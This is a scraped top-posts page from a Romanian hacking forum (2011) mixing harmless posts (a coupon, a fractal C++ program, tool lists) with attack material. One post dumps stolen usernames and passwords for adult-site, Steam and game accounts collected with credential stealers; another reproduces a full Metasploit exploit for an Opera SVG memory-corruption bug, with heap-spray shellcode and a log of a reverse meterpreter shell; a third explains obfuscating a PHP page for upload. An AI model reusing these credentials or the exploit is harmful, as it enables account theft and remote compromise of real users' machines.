Leaderboard
Popular Content
Showing content with the highest reputation on 11/27/11 in Posts
-
Voucherul este valabil doar pana la data de 31. 12. 2011! 1) Intrati pe site-ul Bitdefender si alegeti una din solutiile de securitate oferite. Atentie: Pretul produsului pe care il alegeti trebuie sa fie mai mare sau cel putin egal cu cel al voucherului. Cu alte cuvinte alegeti produse ale caror valoare depasesc 25 euro. 2) Bifati casuta "Am un cupon de reducere" si tastati Halloween2-2011 ca si cupon de reducere si confirmati cu Enter. 3) Reducerea de 25 euro este aplicata. In consecinta cumparati Bitdefender Internet Security 2012 pentru un calculator si cu liceenta pentru 1 an cu 5.95 euro. Pentru o reducere de 15 euro puteti sa folositi cuponul Halloween1-2011. Mai detailat gasiti pe tentativa mea de blog. Voucher reducere 25 // Sa ma fut in ele diacritice!!!!!3 points
-
n-1 fapte bune pana la a fi VIP edit:2 ani fara suspendare, ca aveai 2 ban-uri pe alte conturi si nu a expirat.2 points
-
Bai, minecraft nu am. Steam cu cs+cz+garry nomad1795:kentulaputere //Va rog nu schimbati parola si nu fiti magari. Postez aici conturile in speranta ca o sa va opriti din sentimentul de bagpulism ce-l aveti si o sa faceti fair share. Brazzers Url/Host: http://members.brazzers.com Login: xxIceman326xx Password: manca32 Url/Host: http://members.brazzers.com Login: sonny2571 Password: sonnylane Url/Host: http://members.brazzers.com Login: jay661 Password: jay123 Url/Host: http://members.brazzers.com Login: R210754 Password: alfred Minecraft si battlenet nu vad. Thewest Url/Host: Descoper Login: Bl00D0939 Password: 06coita66 Url/Host: Descoper Login: bogghy97 Password: desktop Url/Host: Descoper Login: bogdddan Password: desktop Url/Host: Descoper Login: msmondialu01 Password: MONDIALU Url/Host: Descoper Login: Mr.Ray Password: 159789 Dreamtemplate nu gasesc. Alte steamuri[neverificate] Url/Host: https://steamcommunity.com/ Login: SpawNyKx Password: 1337smss Url/Host: https://support.steampowered.com Login: AlexConstantin Password: cristian Url/Host: https://store.steampowered.com Login: p34nut13188 Password: brianf13188 Cei ce au stealere sunt invitati sa umple din goluri. Targetul pe care am avut stealere nu era axat pe battlenet/mu alte chestii, deci mai rar cu astea. Am si cpanele, unu per persoana!2 points
-
Tocmai am terminat de rezolvat o problema care, dupa parerea mea, e cea mai misto din toate pe care le-am intalnit. Am scris deja ce aveam de scris pe dreamincode, dau direct copy-paste, e mult si pur si simplu nu are rost: The variables, comments and everything is in romanian, just compile it #include<iostream> using namespace std; bool a[4097][4097]; struct matrice{ int x,y,l; }; void divimp(matrice m){ if(m.l==2){ a[m.y][m.x]=1; } else{ matrice m1,m2,m3,m4; //stabilesc m1(stanga-sus) m1.x=m.x; m1.y=m.y; m1.l=m.l/2; //stabilesc m2(stanga-jos) m2.y=m.y-m1.l; m2.x=m.x; m2.l=m1.l; //stabilesc m3(dreapta-sus) m3.y=m1.y; m3.l=m1.l; m3.x=m.x+m3.l; //stabilesc m4(dreapta-jos) m4.x=m3.x; m4.y=m2.y; m4.l=m1.l; /*Transform 0-urile in 1 in m1*/ for(int i=0;i<m1.l;i++) for(int j=0;j<m1.l;j++){ a[m1.y-i][m1.x+j]=1; } divimp(m2);divimp(m3);divimp(m4);divimp(m1); } } int main(){ int n,i,j; matrice mat; cout<<"n=";cin>>n; mat.x=1;mat.y=n;mat.l=n; divimp(mat); for(i=mat.l;i>0;i--){ for(j=1;j<=mat.l;j++) cout<<a[i][j]; cout<<endl; } return 0; } You just have to give n values that look like this :2^k, whatever k is (an integer). For example, n=2;n=4;n=8;n=16;n=32. For values larger that 128 (like 4096, that I'm waiting now to compute ) you compile and run, and right-click on the blue bar above the actual console, and click properties. From there you go to the "Font" tab and choose the smallest one, then you go to "Layout". There you will have to experiment with the Window Size values so that it will fit your monitor. Also, on the "Layout" tab,(and this is the most important, if you want to see all the shape!)set both the buffer size values to 5000 (you don't use all of it if you give n the value 4096, but your PC will probably take it without complaint). Then just click OK twice and done. Now, awesome things that you should know: You have in front of you n*n 1s and 0s (for 4096 that's 16,777,216 digits!), and you will see triangles of k distinct sizes (k from the n=2^k input condition mentioned above). Again, for 4096 that's 10 triangle sizes.Also, if you would store the result of n=4096 in a text file, considering that you declared the array as an int (4bytes/int), the file will be 67,108,864 bytes large. (that's 64mb of 1s and 0s!). Also, the whole thing took approx 400seconds to be generated, on my computer. (only a fraction of that time, 0.422s was needed to actually compute the 4096x4096 array, the rest was used to put the information on the screen.) Computers are awesome! So, go on, enjoy the power of fractals! Daca e careva interesat de problema (sa o rezolve singur, sau mai stiu eu), sa spuna, si copii cerinta aici (n-am mai copiat-o acuma ca mi-e lene, trebuie sa copii din carte, nu pot da copy-paste )2 points
-
Download Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org1 point
-
1 point
-
1 point
-
Open index.php and change the following lines to and to Now download and install this software : TrueBug PHP Obfuscator & Encoder. (Google for download link, trial version is also ok.) Open it and go to "Files and Folders" Now to go "Obfuscate & Encode" Set the output options as "Obfuscate & Encode" and check EVERYTHING and click "Process" then press "Close" button and also close program. You will find an obduscated index.php in the output folder which you selected. Now remember this is the index.php which you have to upload to 000webhost , not the original one.1 point
-
1 point
-
Coding for Penetration Testers: Building Better Tools Syngress (10-2011) | PDF | 320 pages | 1597497290 | 9.9Mb Coding for Penetration Testers: Building Better Tools /by Jason Andress and Ryan Linn. Tools used for penetration testing are often purchased or downloaded from the Internet. Each tool is based on a programming language such as Perl, Python, or Ruby. If a penetration tester wants to extend, augment, or change the functionality of a tool to perform a test differently than the default configuration, the tester must know the basics of coding for the related programming language. Coding for Penetration Testers provides the reader with an understanding of the scripting languages that are commonly used when developing tools for penetration testing. It also guides the reader through specific examples of custom tool development and the situations where such tools might be used. While developing a better understanding of each language, the reader is guided through real world scenarios and tool development that can be incorporated into a testers toolkit. Discusses the use of various scripting languages in penetration testing Presents step-by-step instructions on how to build customized penetration testing tools using Perl, Ruby, Python, and other languages Provides a primer on scripting including, but not limited to, Web scripting, scanner scripting, and exploitation Download: http://www.filesonic.com/file/4017767383 Mirror: http://filepost.com/files/c5cada95/1597497290Coding.pdf/1 point
-
Exploit for Opera Browser 10/11/12 (SVG layout) Memory Corruption (0day) ############################################################################################################### # Exploit for Opera Browser 10/11/12 (SVG layout) Memory Corruption (0day) # # Vulnerability: # # Discovered: 2010-10-13 # Patched: 0day # Tested on: v10.xx (v10.50, v10.51, v10.52, v10.53, v10.54, v10.6, v10.61, v10.62 and v10.63) # v11.xx (v11.00, v11.01, v11.10, v11.11, v11.50 and v11.51) # # Exploit: # # Coded: 2010-10-14 # Last revision: 2011-10-08 # # This exploit was modified with a new poc and triggering method, to hit Opera Next. The first copy was coded for v10.5x/v10.6x. # # RCE on: v11.00, v11.01, v11.10, v11.11, v11.50, v11.51 and v12.00 pre-alpha r1076 (Opera Next) # # Notes: # # 1) DEP bypass: possible but unreliable. # 2) Let me know if you improve this one # 3) Two days ago, Opera Next was updated to 12.00 pre-alpha r1085 # and this exploit is less reliable, even sometimes never gets crashed. # Anyway, I've also seen remote code execution. # # # Credits: Jose A. Vazquez of http://spa-s3c.blogspot.com # # Greets to: Ruben, Sinn3r, Metasploit Team, Corelan Team, EnRed20.org, etc # # # Running against Opera v12.00 pre-alpha r1076... # # # # =[ metasploit v4.0.1-dev [core:4.0 api:1.0] # + -- --=[ 742 exploits - 378 auxiliary - 83 post # + -- --=[ 228 payloads - 27 encoders - 8 nops # =[ svn r13810 updated today (2011.10.06) # # msf > use windows/browser/opera_svg_0day # msf exploit(opera_svg_0day) > set payload windows/meterpreter/reverse_tcp # payload => windows/meterpreter/reverse_tcp # msf exploit(opera_svg_0day) > set LHOST 192.168.1.103 # LHOST => 192.168.1.103 # msf exploit(opera_svg_0day) > exploit # [*] Exploit running as background job. # msf exploit(opera_svg_0day) > # [*] Started reverse handler on 192.168.1.103:4444 # [*] Using URL: http://0.0.0.0:8080/dpIDdyCpEoqCa5 # [*] Local IP: http://192.168.1.103:8080/dpIDdyCpEoqCa5 # [*] Server started. # [*] Sending Opera Browser 10/11/12 (SVG layout) Memory Corruption to 192.168.1.104:1233 (Method: usual / Target: Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off)) # [*] Sending stage 1 (Spraying the heap) # [*] Sending stage 2 (Triggering the vulnerability) # [*] Sending Opera Browser 10/11/12 (SVG layout) Memory Corruption to 192.168.1.104:1233 (Method: usual / Target: Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off)) # [*] Sending stage (752128 bytes) to 192.168.1.104 # [*] Sending stage 1 (Spraying the heap) # [*] Meterpreter session 2 opened (192.168.1.103:4444 -> 192.168.1.104:1234) at 2011-10-08 22:32:31 +0200 # Interrupt: use the 'exit' command to quit # msf exploit(opera_svg_0day) > sessions # # Active sessions # =============== # # Id Type Information Connection # -- ---- ----------- ---------- # 1 meterpreter x86/win32 0XDE1-A39ED4C12\0xde1 @ 0XDE1-A39ED4C12 192.168.1.103:4444 -> 192.168.1.104:1234 # # msf exploit(opera_svg_0day) > sessions -i 1 # [*] Starting interaction with 1... # # meterpreter > execute -f calc.exe # Process 1752 created. # meterpreter > exit # [*] Shutting down Meterpreter... # # [*] Meterpreter session 1 closed. Reason: User exit # msf exploit(opera_svg_0day) > # ################################################################################################################ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Opera Browser 10/11/12 (SVG layout) Memory Corruption', 'Description' => %q{ This module exploits a vulnerability in the bad nesting with SVG tags. Successfully exploiting leads to remote code execution or denial of service condition under Windows XP SP3 (DEP = off). Best results of reliability using Opera v12.00 pre-alpha r1076 whereas that v11.xx will have less success (depending of opera.dll version). This module won't work against v10.xx because it was modified to exploit Opera upper to v11. Read the lastest references for further details. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jose A. Vazquez' ], 'Version' => '$Revision: 0011 $', 'References' => [ ['URL', 'http://www.beyondsecurity.com/ssd.html'], ['URL', 'http://spa-s3c.blogspot.com/2011/10/spas3c-sv-006opera-browser-101112-0-day.html'], # English ['URL', 'http://enred20.org/node/27'] # Spanish ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'HTTP::compression' => 'gzip', 'HTTP::chunked' => true }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'Compat' => { 'ConnectionType' => '-find', }, 'StackAdjustment' => -3500 }, 'Platform' => 'win', 'Targets' => [ # spray of ~ 450 MB. [ 'Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off)', { 'Method' => 'usual', 'MaxOffset' => nil, 'MaxSize' => nil, 'MaxBlocks' => 900, 'Ret' => 0x0c0c0c0c } ], # Thanks to sinn3r of metasploit.com for this method. [ 'Opera Browser (v11.xx) / Windows XP SP3 (DEP-off)', { 'Method' => 'precise-allocation-size', 'MaxOffset' => 0x800, 'MaxSize' => 0x80000, 'MaxBlocks' => 0x500, 'Ret' => 0x0c0c0c0c } ] ], 'DisclosureDate' => '0day', 'DefaultTarget' => 0)) #Apply obfuscation by default register_options( [ OptBool.new('OBFUSCATE', [false, 'JavaScript obfuscation', true]) ], self.class) end def on_request_uri(cli, request) mytarget = target if(request.uri =~ /\.xhtml$/) #Send file for trigger the vulnerability html = %Q| <html xmlns="http://www.w3.org/1999/xhtml" xmlns:svt="http://www.w3.org/2000/svg"> <head> <meta http-equiv="refresh" content="0;url=" /> </head> <select1 style = 'padding-bottom: 8711px;background-image: url("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH");' > <svt:svg> <svt:title style = 'pointer-events: visiblePainted;font: normal small-caps 120%/120% fantasy;' > <svt:svg> <svt:font> <svt:animateMotion> feFuncR </svt:animateMotion> </svt:font> </svt:svg> </svt:title> </svt:svg> </select1> </html> | #Send triggerer print_status("Sending stage 2 (Triggering the vulnerability)") var_contentype = 'application/xhtml+xml' else #Sending init HTML print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (Method: #{mytarget['Method']} / Target: #{mytarget.name})") return if ((p = regenerate_payload(cli)) == nil) shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch)) addr_word = [mytarget.ret].pack('V').unpack('H*')[0][0,4] var_timer_trigger = (rand(3) + 2) * 1000 var_file_trigger = rand_text_alpha(rand(30)+2) #Build the exploit var_url = ((datastore['SSL']) ? "https://" : "http://") var_url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']) var_url << ":" + datastore['SRVPORT'] var_url << get_resource #Choose the heap spray method if(mytarget['Method'] == 'usual') spray_js = <<-JS var shell = unescape("#{shellcode}"); var size = shell.length * 2; var nopsize = 0x100000 - (size + 0x14); var nopsled = unescape("%u#{addr_word}"); while(nopsled.length * 2 < nopsize) { nopsled += nopsled; } var blocks = new Array(); for (var x = 0; x < #{mytarget['MaxBlocks']}; x++) { blocks[x] = nopsled + shell; } function TriggerVuln(){ document.write("<iframe src='#{var_url}/#{var_file_trigger}.xhtml'></iframe>"); } JS else # # Tested on Opera v11.5x but it's not working on Opera v12.00 pre-alpha # # /* # * Heap spray for Opera that uses VirtualAlloc # * Arguments: # * @blocks - an emtpy array # * @code - the payload # * @offset - padding to align the code # * @chunk_max - max size for each allocation # * @blocks_max - max blocks # */ # # spray_js = <<-JS function heap_spray(blocks, code, offset, chunk_max, blocks_max) { if (chunk_max < 0x7F000) { throw "This function is meant for size 0x7F000 or higher to trigger VirtualAlloc"; } chunk_max /= 2; var nops = unescape("%u0c0c%u0c0c"); while (nops.length < chunk_max) nops += nops; var offset_chunk = nops.substr(0, offset-code.length); var block = offset_chunk + code + nops.substr(0, chunk_max-offset_chunk.length-code.length); while (block.length % 8 != 0) block += unescape("%u0c"); var shellcode = block.substr(0, (chunk_max-0x1c)/2); for (var i=0; i < blocks_max; i++) { blocks[i] = shellcode + unescape("%u0c0c"); } } var blocks = new Array(); var code = unescape("#{shellcode}"); heap_spray(blocks, code, #{mytarget['MaxOffset']}, #{mytarget['MaxSize']}, #{mytarget['MaxBlocks']}); function TriggerVuln(){ document.write("<iframe src='#{var_url}/#{var_file_trigger}.xhtml'></iframe>"); } JS end if datastore['OBFUSCATE'] == true spray_js = ::Rex::Exploitation::JSObfu.new(spray_js) spray_js.obfuscate trigger_sym = spray_js.sym('TriggerVuln') spray_js = spray_js.to_s + "setTimeout('#{trigger_sym}()',#{var_timer_trigger});" else spray_js = spray_js.to_s + "setTimeout('TriggerVuln()',#{var_timer_trigger});" end html = %Q| <html> <head> <script type="text/javascript"> #{spray_js} </script> </head> <html> | print_status("Sending stage 1 (Spraying the heap)") var_contentype = 'text/html' end #Response send_response(cli, html, { 'Content-Type' => var_contentype, 'Pragma' => 'no-cache' }) #Handle the payload handler(cli) end end # 1337day.com [2011-10-09] Sursa: Opera Browser 10/11/12 (SVG layout) Memory Corruption (0day) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode1 point
-
Uite aici inca cateva tutoriale folositoare pentru sqlmap: Kaotic Creations: SQLMAP Basic Introduction and Tutorial Kaotic Creations: SQLMAP Volume 2: TIPS & TRICKS Kaotic Creations: This ain't your standard $GET request! Kaotic Creations: Owning the Database with SQLMAP and METASPLOIT si sqlmap manual: sqlmap user's manual1 point
-
Web Application Analysis Contents 1 Backdoors 2 CMS Scanners 3 Database Assessment 3.1 MS-SQL 3.2 MYSQL 3.3 Oracle 3.4 SQL Injection Frameworks 4 Fingerprinting 5 Fuzzers 6 Proxies 7 Scanners 8 Security Training Environments and Programs 9 Testing Frameworks 10 Web Browser Assessment 11 Web Browser Plugins Backdoors XSS Shell CMS Scanners CMS Explorer OWASP Joomla Vulnerability Scanner Plecost-wordpress-fingerprinter WPScan Database Assessment MS-SQL DBPwAudit Metacoretex Mssqlfp MSSQLScan multiinjector Pblind SA Exploiter SQLbrute SQLiX SQLMap SQL Ninja MYSQL DBPwAudit Metacoretex MYSQLAudit MySploit Pblind SQLCheck SQLData SQLiX SQLMap Sqlsus UDF Oracle DBPwAudit Metacoretex Opquery Opwg Oscanner Ose Otnsctl Pblind SQLbrute SQLiX SQLMap SQL Injection Frameworks BSQL Hacker Fingerprinting Wafp Fuzzers FuzzDb OWASP ZAP PowerFuzzer Wfuzz Proxies Burpsuite Fiddler OWASP ZAP Paros Proxy ProxyStrike Ratproxy Webscarab Scanners CSRFTester Curl DFF Scanner DirBuster Grabber Grendel Scan Httprint Jmeter Lbd List Urls Mini Mysqlat0r Netsparker Community Edition Nikto OpenAcunetix OWASP ZAP SecuBat Skipfish SoapUI Swfintruder W3AF Wapiti WebRaider Webshag WMAT x5s Xsss Yokoso! Security Training Environments and Programs DVWA Jarlsberg Web Security Dojo Testing Frameworks Bizploit Sahi Websecurify Web Browser Assessment Beef Browser Fuzzer 3 (bf3) Browser Rider Web Browser Plugins Groundspeed X06D Sursa: Web Application Analysis - Security and Hacking Tools1 point
-
Brazzers am testat si mergeau 2. Steam mergea primul. De acum inainte va rog sa intrebati doar pe mess la nonsens_verbal , ca sa evitam copii.0 points
-
Am scris un articol despre cum sa ajungi la 10$/zi din upload in 1 saptamana, binenteles depinde si de voi, fara putina munca nu faceti nici macar 1 cent! Prin ce difera acest tutorial de altele de pe net? Luati-l si o sa vedeti, nu va asteptati la zeci de pagini, sunt doar 3 pagini dar metoda e unica, garantat o sa va scoateti banii, totusi repet, nu va asteptati sa scoateti bani frecand menta! Daca nu ati inteles inca articolul e de vanzare - 15$, plata se face prin paypal sau coduri de reincarcare Daca e atat de tare metoda asta de ce o vinzi? Nu imi place sa stau sa urc manual fisiere, imi pierd rabdarea + am venituri marisoare din alte chestii! Cine e interesat sa imi de-a pm! CITITI TOT TEXTUL - TUTORIALUL COSTA 15$-1 points
-
Dau conturi cam pe tot ce se poate(daca se poate). Daca am si imi cereti, va dau, ca nu am ce face cu ele. Postati aici!-1 points